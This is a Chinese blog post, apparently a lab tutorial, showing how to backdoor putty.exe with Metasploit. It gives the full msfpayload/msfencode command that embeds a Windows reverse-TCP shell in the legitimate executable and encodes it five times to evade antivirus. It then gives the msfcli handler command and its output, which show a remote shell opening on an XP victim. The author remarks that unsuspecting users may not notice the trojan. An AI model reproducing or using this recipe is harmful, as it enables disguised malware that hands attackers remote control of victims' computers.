metasploit隐秘地启动一个攻击载荷

在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录

root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe -o putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m42.531s
user    0m25.086s
sys     0m16.381s
root@bt:/opt/metasploit/msf3# 

上传到XP,还是报威胁。



我关掉杀毒软件,然后双击putty_backdoor.exe,看看:



弹出这个,但是很快就没了,出现了一两秒的样子。

这时,当我在BT5运行msfcli时,它就一直显示,不会一闪而过:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##



       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1136) at 2013-04-28 06:13:58 -0400

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\1>

运行msfcli后,出现

[*] Starting the payload handler...

时,就双击putty_backdoor.exe,这时,那上面的图片所显示的登录的界面,就一直停留着了,不会像刚才那样,一闪而过了。

而且,它也有putty.exe的功能,能正常登录,如下图:




但是,当我在bt5退出时:

C:\1>exit
exit

[*] Command shell session 1 closed.  Reason: Died from Errno::ECONNRESET

root@bt:~# 

XP上的登录界面(如上图所示)也没有了。


这时,不明真相的人,可能并不会在意。不过,如果多试几次,可能会看出点问题来。


现在的问题是,这个exe惊动了杀毒软件,没有躲过杀毒软件。


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值